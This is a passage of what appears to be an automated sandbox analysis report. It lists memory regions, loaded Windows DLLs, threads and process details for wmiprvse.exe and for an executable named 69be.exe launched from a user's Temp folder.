"tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 4269 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 4270 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = "tbssvc.dll" filename = "\\Windows\\System32\\tbssvc.dll" (normalized: "c:\\windows\\system32\\tbssvc.dll") Region: id = 4271 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tbssvc.dll.mui" filename = "\\Windows\\System32\\en-US\\tbssvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tbssvc.dll.mui") Region: id = 4272 start_va = 0x7fef4bc0000 end_va = 0x7fef4bcafff monitored = 0 entry_point = 0x7fef4bc46ec region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Region: id = 4275 start_va = 0xde0000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 4276 start_va = 0x1260000 end_va = 0x135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 4277 start_va = 0x1360000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Thread: id = 129 os_tid = 0xf08 Thread: id = 130 os_tid = 0xc7c Thread: id = 131 os_tid = 0xc78 Thread: id = 132 os_tid = 0xc74 Thread: id = 133 os_tid = 0xc70 Thread: id = 134 os_tid = 0xc68 Thread: id = 135 os_tid = 0xc64 Thread: id = 136 os_tid = 0xc60 Thread: id = 167 os_tid = 0xff0 Process: id = "11" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x5e182000" os_pid = "0x570" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3316 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3317 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3318 start_va = 0x30000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3319 start_va = 0xb0000 end_va = 0xb3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3320 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3321 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3322 start_va = 0x140000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 3323 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3324 start_va = 0x210000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3325 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 3326 start_va = 0x410000 end_va = 0x414fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3327 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3328 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3329 start_va = 0x440000 end_va = 0x5c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3330 start_va = 0x5d0000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 3331 start_va = 0x760000 end_va = 0xa2efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3332 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3333 start_va = 0xa40000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 3334 start_va = 0xa50000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 3335 start_va = 0xad0000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 3336 start_va = 0xb70000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 3337 start_va = 0xc10000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 3338 start_va = 0xca0000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 3339 start_va = 0xd40000 end_va = 0xdbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 3340 start_va = 0xdd0000 end_va = 0xe4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 3341 start_va = 0xf00000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3342 start_va = 0xf80000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 3343 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3344 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3345 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3346 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3347 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3348 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3349 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3350 start_va = 0x13fd00000 end_va = 0x13fd6bfff monitored = 0 entry_point = 0x13fd3b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3351 start_va = 0x7fef09a0000 end_va = 0x7fef09edfff monitored = 0 entry_point = 0x7fef09a1198 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 3352 start_va = 0x7fef09f0000 end_va = 0x7fef0a14fff monitored = 0 entry_point = 0x7fef0a08d6c region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 3353 start_va = 0x7fef1ed0000 end_va = 0x7fef1f55fff monitored = 0 entry_point = 0x7fef1edffd0 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3354 start_va = 0x7fef1f60000 end_va = 0x7fef1f9bfff monitored = 0 entry_point = 0x7fef1f85aa8 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 3355 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3356 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3357 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3358 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3359 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3360 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3361 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 3362 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3363 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3364 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3365 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3366 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3367 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3368 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3369 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3370 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3371 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3372 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3373 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3374 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3375 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3376 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3377 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3378 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3379 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3380 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3381 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3382 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3383 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3384 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3385 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3386 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3387 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3388 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3389 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3390 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3391 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3392 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3393 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3394 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3395 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 137 os_tid = 0xec0 Thread: id = 138 os_tid = 0x56c Thread: id = 139 os_tid = 0x47c Thread: id = 140 os_tid = 0x21c Thread: id = 141 os_tid = 0x518 Thread: id = 142 os_tid = 0x3a4 Thread: id = 143 os_tid = 0x790 Thread: id = 144 os_tid = 0x6dc Process: id = "12" image_name = "69be.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.exe" page_root = "0x2eabc000" os_pid = "0xfb0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x390" cmd_line = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" cur_dir = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4373 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4374 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4375 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4376 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4377 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4378 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4379 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4380 start_va = 0x400000 end_va = 0x993fff monitored = 1 entry_point = 0x423000 region_type = mapped_file name = "69be.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.exe") Region: id = 4381 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4382 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4383 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4384 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4385 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4386 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4387 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4388 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4389 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4390 start_va = 0x280000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4391 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4392 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4393 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4394 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4395 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4396 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4397 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 4398 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4399 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 4400 start_va = 0x9a0000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4401 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4402 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4403 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4404 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4405 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4406 start_va = 0x1b0000 end_va = 0x216fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4407 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4408 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4409 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4410 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4411 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 